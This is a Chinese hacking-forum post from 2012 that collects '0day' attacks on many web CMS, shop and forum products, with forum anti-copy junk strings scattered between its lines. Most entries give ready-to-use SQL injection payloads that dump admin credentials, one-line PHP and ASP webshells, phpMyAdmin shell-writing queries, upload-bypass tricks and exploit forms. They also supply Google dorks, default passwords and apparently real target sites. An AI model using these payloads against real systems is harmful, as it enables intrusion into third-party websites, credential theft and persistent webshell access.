中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
; g# m5 q! H2 R) }7 K
1 M0 T) \8 Y' b) F! c; n
直接上exploit:
& e9 v6 i' C- U5 p9 [0 L9 `
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
. a7 C- q+ l/ {0 w
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
/ D, G- w' L5 Z; M$ H$ a; r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- C5 V' R+ z: P) [- Y, Z
Asprain论坛 注册用户 上传图片就可拿到webshell
) [% I$ Q- E. l) h8 ~( o
5 S, P* b" n0 P% X( H* p$ U3 _
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
+ [3 |4 L. S# X6 u
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
4 J" x% v6 x5 }1 w5 v
2.gif 为一小图片文件,一定要小,比如qq表情图片
- N! e$ y: B% U& I7 u
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
4 e H3 I) x; e$ l" V
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
, x% H7 [$ g" m: Q7 c9 p
5.q.asp;.gif
0 `; Z$ P9 O+ z3 Y( e5 ?4 d7 U
google:Powered by Asprain
& s, d% L% z8 s- |/ Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 I. J/ ? W& \9 @/ \
, ]1 W& }2 R8 u" s2 t
ShopNum1全部系统存在上传漏洞。
3 b$ M+ T; _0 B! e m2 d
" A" A* x1 H3 N1 _# u
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
9 Z w& O' I# j+ X4 u
按说明 提示登录后台。。
3 Q% j; O; h7 t+ x. B
在后台功能页面->附件管理->附件列表
% a5 r+ B5 g( n2 b1 f
可以直接上传.aspx 后缀木马
6 t, \7 ?- i5 C) B, y
http://demo.shopnum1.com/upload/20110720083822500.aspx
3 w% K. h- I w. ^; @+ U2 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 @) V7 c k# L8 |
! P, l9 |! c Q0 K' h- a$ H
牛牛CMS中小企业网站管理系统 上传漏洞
0 b3 o/ Q9 d! w1 C4 a
1 R" M3 _- v7 S# ?
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
: b, A; ~$ j ?( Y, ^( S; Z) Y
后台:admin/login.asp
/ d- c' R) s5 N M6 v0 r' z O
ewebeditor 5.5 Nday
7 O( x4 W+ j b8 I L
exp:
! K- g' v5 b2 C7 B0 w% U/ |
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
! J5 l6 v% F4 a$ R* ~* o- U; v& e
<input?type=file?name=uploadfile?size=100><br><br>?
( U9 j7 u0 T0 P* v" r
<input?type=submit?value=upload>?
5 Q9 v3 y5 d! z, }
</form>
& Z9 O5 O1 s6 _( W, a
ps:先上传小马.
! f4 z( I% U& d2 A) Z5 [6 X6 C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
- N! J8 V: }" ^$ B0 a1 L
* u2 l$ ? s) V2 F3 d# b, l! Q9 Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, z" r, B! M7 [9 c% r V
1 r$ z1 t/ F' t* f! f
YothCMS 遍历目录漏洞
) Z2 ]5 [' F: J% s( D
4 j7 A1 \( f; k6 x" }8 F
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
7 y# j( J' j9 B3 f- a3 E- N
默认后台:admin/login.asp
9 A; c4 @2 F8 ^$ H8 y" r; A$ @$ C
遍历目录:
* @. [5 ~* ^, w/ c3 r$ j! Y1 s4 b( C& s
ewebeditor/manage/upload.asp?id=1&dir=../
* D- m# p0 I, |* W+ v
data:
) X. p; m1 X/ s
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
}* L4 z5 r z$ L% p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
?9 o2 x u9 w6 \( N& y9 T3 _
% a K- \, M: v
Net112企业建站系统 1.0
/ _) i; \! R' {, M4 j3 E9 g4 Q. S
2 B( C# }& u% p* a1 D* r+ n/ Q. N$ Q
源码简介:
9 z9 T' C2 Q2 p
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
- {! J5 P8 h& R$ ^& G0 n
添加管理员:
: l7 r) Q9 n6 x/ V; @
http://www.0855.tv/admin/admin.asp?action=add&level=2
/ t1 l; e. @9 x, i
其实加不加都不是很重要,后台文件都没怎么作验证。
6 `! g3 H, T$ h/ t, i h1 y
上传路径:
) [. e# U5 c$ Z, ?7 E$ e3 B9 }5 l
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
* a2 b, f- i$ U
http://www.0855.tv/inc/Upfile.asp?Stype=2
5 V% J# c+ \7 R: k
怎么利用自己研究。
( c1 }8 q/ _: X' ]
遍历目录:
( \7 Q6 g' W# b# K
http://www.0855.tv/admin/upfile.asp?path=../..
9 J8 U5 l1 M5 z
如:
9 z* z3 c) R) ~8 @) n
http://www.0855.tv/admin/upfile.asp?path=../admin
) y) t9 M, v' N6 l
http://www.0855.tv/admin/upfile.asp?path=../data
9 _ X9 f8 b, _. k9 e- F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 E5 ]% A- n5 a' E2 l. x
3 ?, O9 Z: ^* W8 t& M
易和阳光购物商城通杀 上传漏洞
1 j8 f1 [ R6 h! F( }1 A' J9 O
: P X$ o3 M6 j: x" ]9 G3 l7 c
前提要求是IIS6.0+asp坏境。
. k. B5 d, }& d* p' Y
漏洞文件Iheeo_upfile.asp
9 }" Y( W% U% ^, R
过滤不严.直接可以iis6.0上传
1 W& \1 A% f/ `4 n" B7 m
把ASP木马改成0855.asp;1.gif
# ]4 v4 V: B+ J9 ]9 L- M; r
直接放到明小子上传
c& I/ a9 Q# u' o' w
Google搜索:inurl:product.asp?Iheeoid=
3 ?1 v; v; E" D0 c9 j) K7 E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[2 k8 b, E4 _; v2 \
9 m- U! `& I; m9 K
phpmyadmin后台4种拿shell方法
! `) B* s- I# E# ~+ }. ]0 G: F/ t y2 i
6 c6 ^: ^' r- {) r5 A
方法一:
7 e, ]: Q# d% C4 T1 G
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
8 O# W! k$ W) x4 R' e6 D
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
3 j. n9 E) s$ }9 w
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
6 s9 G: Z- O; q% B, s. T
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
1 N+ S# E- }* o2 O3 m
一句话连接密码:xiaoma
3 U+ \" P; ^& e( _% G7 c" k
方法二:
: W" n, x& u: A3 r9 I
Create TABLE xiaoma (xiaoma1 text NOT NULL);
/ R% m$ u& j; X& F
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
! M5 g) z1 ^2 O3 C& L
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
? l2 W4 r% O( {. n
Drop TABLE IF EXISTS xiaoma;
9 D, l/ g# P/ ^
方法三:
2 u# W( V4 E$ i1 t5 Y" l7 C
读取文件内容: select load_file('E:/xamp/www/s.php');
5 C2 U! U0 U2 r! r8 d
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 k0 K3 c! L! @) b3 X' k0 x
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# l# K: Z3 o2 U. W
方法四:
6 N ^ f4 a; n% v! v# R+ ]( |% T
select load_file('E:/xamp/www/xiaoma.php');
3 z) A, X: r. G- Q# E- Q. w' u
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& q0 J1 r& G' M
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
e5 M: T8 D0 V Y" Y- E- q1 }7 I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- P7 n1 C h; F; d, b0 q2 |
( u. ]$ u& W9 e+ K! H
传信网络独立开发网站源码0day漏洞
7 {' ^" s8 n8 `/ k1 s+ T% X
9 C7 R r X0 s0 K' X; a7 q
后台system/login.asp
$ ^3 B# ?2 n4 w+ s7 ^2 e
进了后台有个ewebeditor
% r% m+ j- N- n
Google 搜索inurl:product1.asp?tyc=
7 B+ ?9 y1 ?* ]0 w! F Q
编辑器漏洞默认后台ubbcode/admin_login.asp
. U# c& N: V: e" ]* R& ?
数据库ubbcode/db/ewebeditor.mdb
3 u. w8 w/ [4 X% h$ ]
默认账号密码yzm 111111
( Q5 _+ `+ ?/ Z
% c- j! X) _3 k/ f9 l
拿webshell方法
- |' `, n+ b5 d. D7 n# J& T
登陆后台点击“样式管理”-选择新增样式
" C1 o+ [( q$ Q& u) N7 [9 o5 B1 q1 E1 v
样式名称:scriptkiddies 随便写
$ u, _) _# h4 a. Z m, O3 B+ S
路径模式:选择绝对路径
) t- @5 I/ }# ]4 ^ s) |/ p# f3 M8 x4 F
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
4 S8 m) _. V8 b0 h$ [" `( z4 }
图片类型比如就是我们要上传的ASP木马格式
: r% A. w1 \+ }! J: ?6 s! f
上传路径:/
# I! U% u8 ?1 w" S& O- b) m
图片限制:写上1000 免的上不了我们的asp木马
" M$ {; R3 \, c& D' S, Y0 b1 G; l
上传内容不要写
; _9 |/ n& y1 Z5 }/ a
可以提交了
# ^: M6 N3 J# i+ I3 A
样式增加成功!
2 }7 ~# p0 ^$ r2 d7 ?+ d; T, n
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
, |2 k' d% {4 u# g- w
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
?; X& O" t5 H% U3 P
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
7 b) V5 `' i( X u& m( f7 f
上ASP木马 回车 等到路径
: O9 @1 \! m( N8 y* V) Q/ L
+ C' E2 H" L! p, V
后台:system/login.asp
# T x" i3 h5 _" s0 u: I
Exp:
, O% y5 b$ C; D: w
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
4 j. k& |% G! d% E! h; r
测试:
+ J# T* N1 A; M4 s6 d
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
5 l3 y" R' e' x r
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
5 s" F: ^9 I( ~3 P" ]6 K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ l9 c8 C8 i2 V- I! Z9 r$ k
5 C' P1 |/ N9 j4 y
foosun 0day 最新注入漏洞
# o$ m# [6 r7 p6 Q# |$ q \. P1 i
1 r6 k) l \" a5 Q+ N6 L: D
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
$ o& r L: D( D
利用简单的方法:
8 P* i7 Q) @$ b% r$ _
暴管理员帐号:
$ G3 ]8 j7 T+ d) X
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ W, y i! r" s% x% m
暴管理员密码:
$ L8 D+ C& e( g
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
) ]% d& a. n) v/ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ ^7 X0 u9 \- ~7 O9 B* @: d
+ e. b, l R* g; g' d5 f7 p: o5 G
网站程序的版权未知!
3 U/ w. W- S, u+ M* W; p$ p
' @$ p V' g: h& @$ F/ S) i
默认网站数据库:
5 s& { t5 @) C3 M0 H0 A0 l
www.i0day.com/data/nxnews.mdb
; Q/ d" G5 S: Z k6 Q
ewebeditor 在线编辑器:
' B, d6 x% A/ o5 m& ]. X3 m
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
1 m) {7 S& a, N7 |# F& |+ D) z
登录地址:ewebeditor/admin_login.asp
3 B/ y, L( a7 T( Z5 P) x" q8 W" Y
默认密码:admin admin
- u! v1 |% `) ]7 }2 H
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
1 S6 R! R$ l' o0 M w1 _# r
6 ?. z# q8 G, \+ K9 G
Sql注入漏洞:
" X h1 r5 Z, b+ \, v+ y0 J: h
http://www.i0day.com/detail.asp?id=12
4 Q( t, n; z' S+ S
exp:
; {. w, Z" ?( U6 g9 r' _. N
union select 1,admin,password,4,5,6,7,8 from admin
8 y% y% e C/ {+ ^
爆出明文帐号/密码
- n, p7 |8 X# U
' t# \8 i! z: @
上传漏洞:
. `" j) P: ~$ S0 V& h; _
后台+upfile.asp
0 J9 a( A9 _4 |' I) p5 P* n/ \! i% X
如:
2 L9 F) _* W0 Y5 n% V$ V B1 O; y6 B
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
# M0 i* `. Q3 R4 x. [) W
shell的地址:网址+后台+成功上传的马
7 J- @" P9 I7 N& F( R' [
google:inurl:news.asp?lanmuName=
?4 X' P, u" Y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 A- ^% x, Y5 h. ]* k
! r, K# {% W* W" e$ ~
dedecms最新0day利用不进后台直接拿WEBSHELL
0 U4 O! e; Z# f8 V
0 K) @, ?. m2 w: I) J
拿webshell的方法如下:
% [- a/ E8 L: L, w
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
# S& t7 U. T+ _! F: V
前题条件,必须准备好自己的dede数据库,然后插入数据:
: f2 C! D! q7 {, e4 C0 C5 A! n
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 F) |8 K6 ~. H* H
' I. x3 [" n. \( F: D
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; l9 w: J. g- y" U; ]' g
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
9 ` l1 I. J$ @* M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
& b) p O8 v. U" C- B( m* y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; N1 H2 N8 n; |9 _
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
2 r* e" ~& ^: V. |
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 ~' d7 g' s* A- B3 e) `: |
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; G5 Y9 Y! i, D! e, H: e) Z
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
9 o- @$ g+ G: z# o
<input type="text" value="true" name="nocache" style="width:400">
3 T: Q6 L+ b% n D7 |3 Y
<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 T. ^7 i4 E; I9 t
</form>
7 @/ y" o, `3 w+ p5 I
<script>
9 }' V, U( Z4 X; u8 e8 q
function addaction()
5 f, w; ], j2 r6 m
{
+ r* i* e5 k& y ^! _& {
document.QuickSearch.action=document.QuickSearch.doaction.value;
( O6 ?8 f. Q; M: {/ v6 m0 S
}
7 w2 i% K: b8 G, P" |, @% [0 {
</script>
% r0 P5 }# [- g6 C6 S
-----------------------------------------------------------------------------------------------------------------------------------------------
6 D7 _, c8 ?2 f j+ ?" p
, z0 V; l E7 v: p% P- Y
dedecms织梦暴最新严重0day漏洞
: U5 b, `6 x9 _
bug被利用步骤如下:
: p9 k) H/ N" Z
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, K* \6 ], r( C3 p% {' W
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
1 f& X+ Z+ M1 B
-------------------------------------------------------------------------------------------------------------------------------------------
$ ?) [# D$ n) u5 g/ L N! M
6 m1 u: t' m: S' ~. d1 a
多多淘宝客程序上传漏洞
; T V* i( B/ r- D( C. P5 P
漏洞页面:
1 ?$ A9 ~! n' y1 l# X1 _
admin\upload_pic.php
( N4 L' c6 j4 s
传送门:
) [$ A( }# V7 Z& K, ` @/ A' Z4 F
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
; [% a. `. U% y0 [: n- {
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- z( q* e7 O5 d7 N) s' B
------------------------------------------------------------------------------------------------------------------------------------------------------
* W! z) A5 a2 Y( C, o4 }
8 G: n2 }# O; f' `, n! g) x
无忧公司系统ASP专业版后台上传漏洞
& O1 I* r, M: E, E/ l
漏洞文件 后台上传
: e" h* U$ ^& H" J
admin/uploadPic.asp
3 M; a8 L$ b) u4 w, h \9 c |
漏洞利用 这个漏洞好像是雷池的
0 p6 u! b' P) @6 y: x0 K( ~
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
" R# D' o1 m' s' I$ H e8 E& o, d
等到的webshell路径:
0 e9 \+ @+ N. r# m4 o$ `* ~" M
/UploadFiles/scriptkiddies.asp;_2.gif
7 O" K! \# @- r* @
---------------------------------------------------------------------------------------------------------------------------------------------------
* }" Q& _7 B0 R
' O4 a/ M+ Q; V: m* h
住哪酒店分销联盟系统2010
8 a, M" T7 _3 h8 a
Search:
$ l: C, o7 r, Y4 [) T. Q
inurl:index.php?m=hotelinfo
+ u+ K5 i0 ~3 z3 }
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
: Q- t+ {6 G, o1 W5 d
默认后台:index.php?m=admin/login
) ]* m/ @, E) U6 _7 D
--------------------------------------------------------------------------------------------------------------------------------------------------
- U& l2 }) i4 f4 x( ~6 h
3 r3 d* G: q4 O k4 D2 v0 O" D
inurl:info_Print.asp?ArticleID=
. @) o! j _ x
后台 ad_login.asp
* j) a( Z% t6 ~5 t1 A
爆管理员密码:
; f/ h/ `% \7 f. q$ }$ P
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
; Y2 R- F. l; s, o$ I
------------------------------------------------------------------------------------------------------------------------------------------------------------
8 y8 L ~+ R0 I: n
8 X. M! R: u& i! o" k+ p# }2 n
搜索框漏洞!
4 M! h, H7 U. P% O* |$ r
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
+ N! H$ D, R8 y) Z' O6 K
--------------------------------------------------------------------------------------------------------------------------------------------------------
* X9 [6 H# e# s) d
0 k! Q6 ^8 ?3 y' x. s% \8 o( B
关键字:
" j8 k6 J5 l+ O8 e7 R+ E& Q
inurl:/reg_TemletSel.asp?step=2
( h& i8 ^- a4 s7 Q0 \, b, Z0 w. }
或者
" M5 E( d# j# Z6 X) n* i5 }1 V
电子商务自助建站--您理想的助手
8 v2 B8 u/ ^' j1 w2 g6 X
-------------------------------------------------------------------------------------------------------------------------------------------------
2 i2 {( f" y" ]
7 p# m }% F+ u
iGiveTest 2.1.0注入漏洞
6 ~/ Z2 H e9 u$ C) B$ A/ L( y
Version: <= 2.1.0
% u4 z3 w m' O
# Homepage:
http://iGiveTest.com/
' ]4 f8 U1 b) H) R
谷歌关键字: “Powered by iGiveTest”
S, T+ B1 ?. S* @
随便注册一个帐号。然后暴管理员帐号和密码
! n* \; b" K2 m; v5 a; J4 f
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
% L/ M z" q* e5 n* ?/ C
------------------------------------------------------------------------------------------------------------------------------------------------
. C( O2 a- Z8 l1 c% g- p
, I, n) R$ n! o+ p' v+ Z; w
CKXP网上书店注入漏洞
9 e4 M. p8 }3 D5 ], d! H
工具加表:shop_admin 加字段:admin
9 V& O+ R( j6 r4 m: @/ P
后台:admin/login.asp
% J9 L4 g$ ?0 V
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
5 g/ q8 ^' A5 x# }
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
6 n$ Q3 U: y* w0 r# I( P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( k! O3 _, f$ l8 ^
' ?3 W/ z7 S3 \% {
段富超个人网站系统留言本写马漏洞
! o5 Q% ?- O, b2 m
源码下载:
http://www.mycodes.net/24/2149.htm
, B0 w8 [" b- ~
addgbook.asp 提交一句话。
0 q9 ~7 A6 _6 w' F8 |0 m
连接:
http://www.xxxx.tv/date/date3f.asp
/ X5 W- s% p9 ^, r7 I0 ~
google:为防批量,特略!
& V! U% f; \- h' A% |8 N* r+ h
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 e5 p% B, r1 z3 y
! j# w% i- q* D
智有道专业旅游系统v1.0 注入及列目录漏洞
?- Y: c) R0 R6 g, j% d# d2 F( F
默认后台路径:/admin/login.asp
" B/ ^! B4 O, X& ~: W3 k& w. B
默认管理员:admin
& z# p& _7 X* I7 l5 H
默认密码:123456
* T0 T; ]0 E O9 c7 f
SQL EXP Tset:
" s9 ~) R o3 ^; t
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
: x2 t0 @3 Y. x1 n6 _* e1 Z0 _( U
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! ~: N# i$ m4 p- e; T9 M% f7 n
+ @4 ~* V0 ?! x3 x% \
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
8 _0 B3 ~% M" W6 R' T& n
EXP:
& k9 _/ b5 g% s/ a
<title>eWebeditoR3.8 for php任意文件上EXP</title>
x! T2 b8 E/ }$ J/ ~0 F1 u
<form action="" method=post enctype="multip
6 {- \2 j6 R2 h# b8 q
art/form-data">
/ n/ Z. f% {$ h0 T$ \" n
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
. R/ z4 w( \( s p, Z: b( B' f
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
: ]: T |( O! G! h. t
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
3 j# ^5 Z) H& v
file:<input type=file name="uploadfile"><br>
/ f" D; l. K% f. N; l
<input type=button value=submit onclick=fsubmit()>
4 `. A/ H6 Q" h6 T
</form><br>
( D6 D) R! M( H5 U
<script>
6 v; c$ H7 t; E/ }) N" |
function fsubmit(){
& P- L: _9 i8 q. O2 i
form = document.forms[0];
/ P$ v4 g% f4 q0 [
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
( C1 B2 L6 u) k. F
alert(form.action);
9 x9 j. W; _0 E% Z
form.submit();
; }7 h$ s1 m6 ]
}
" k' D+ h4 x" Z4 ]9 C
</script>
. F! h4 w: m6 {$ X! ~
注意修改里面ewebeditor的名称还有路径。
- e/ x2 d- P# q7 g, e5 Q: J' i( K' k
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 _7 ?9 Q2 H- s+ ]5 H4 F
- T! p3 S+ {) Z' A; ?* h
提交’时提示ip被记录 防注入系统的利用
3 q2 {3 _8 A, t. |! e( m6 X" x9 ^
网址:
http://www.xxx.com/newslist.asp?id=122
′
5 T( r9 P% ^ W+ W+ q' n5 \
提示“你的操作已被记录!”等信息。
9 D/ E/ y# b- C7 B
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
* u) X2 t5 j' Q+ G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 ?# P- Z: c4 U1 w+ D% k
3 w4 A" x a5 M( x4 q$ h
西部商务网站管理系统 批量拿shell-0day
' h4 k) D9 B9 B* r
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
" I! i: o6 i' T) x5 {
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
. v b9 {& O& J5 b( ]9 k* { ]5 @
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
" J" ` l1 M, i' L i6 |1 N7 g3 r
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
) p. N+ I \, B! M% ^
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ q$ |0 [! o& u3 @, {
8 }4 e) Z0 S5 D
JspRun!6.0 论坛管理后台注入漏洞
5 c2 I B0 p' Q
6 b% f! W0 v; r4 M3 s7 a
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
8 }2 n9 R7 ^& Y5 X' T2 R' N5 \
JspRun!6.0
' R7 S( \( Q3 ?
漏洞描述:
! {- @5 W, D4 z; n0 M/ ^6 O
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
' T# ^* {7 g4 F. g
在处理后台提交的文件中ForumManageAction.java第1940行
& w' ]& B8 }5 \2 v' C
String export = request.getParameter("export");//直接获取,没有安全过滤
8 C3 W& T2 _8 K# q
if(export!=null){
& }# ?# K$ T' |1 a5 J: ^
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
+ a3 ]& w q7 N
if(styles==null||styles.size()==0){
2 d! C0 k$ K' N1 M: k* m
<*参考
: A: H h7 V x/ @: f% ?2 y
nuanfan@gmail.com
# G3 o8 G$ M# ~! \+ \ M, Z
*> SEBUG安全建议:
}7 j9 f2 f: M/ }/ j9 y
www.jsprun.net
( ?* e6 ?- G, n4 E
(1)安全过滤变量export
6 E5 }4 l5 n9 m6 B, e; {
(2)在查询语句中使用占位符
( \9 u* [! D" x7 O
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# M9 G5 b* v% Z& f9 R
4 Y4 n* t4 v% B
乌邦图企业网站系统 cookies 注入
: I; Q" N9 A* |5 \
# i3 b, S r7 d( N$ n& H1 q
程序完整登陆后台:/admin/login.asp
/ @' ~! J; l6 X' M \
默认登陆帐号:admin 密码:admin888
4 t; v6 x" y: L) G, G* \+ K
语句:(前面加个空格)
; z. j! q w2 ~% S! R
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
G4 m8 Z# D: Q0 b
或者是16个字段:
9 y& ~3 b9 g( Y5 {! G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
9 \( r5 b, X- [/ m* Z0 S
爆不出来自己猜字段。
, d; a3 O2 t1 _$ E
注入点:
http://www.untnt.com/shownews.asp?=88
, Q( X! W/ |% U& ]6 h+ j
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
8 z- s7 m: v8 P) I+ g9 G, j, ]
关键字:
! Q* ]) d8 X8 O+ b# }& k
inurl:shownews?asp.id=
. p- x+ T7 V/ t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; y! ~% T( U1 I! q7 J9 f, J
$ ]3 v+ ?2 Z% A
CKXP网上书店注入漏洞
" {$ d0 Z6 V: W1 S
$ G5 D. Q0 j5 t; U$ C% x7 H' S! p
工具加表:shop_admin 加字段:admin
) g& P& \4 D$ W# ]+ @
后台:admin/login.asp
# c9 }. q- g9 B
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 \6 F0 f; W, H; q6 J
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
7 D) m$ i- v/ i9 T
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 {8 E. k( @2 i- x4 @0 n
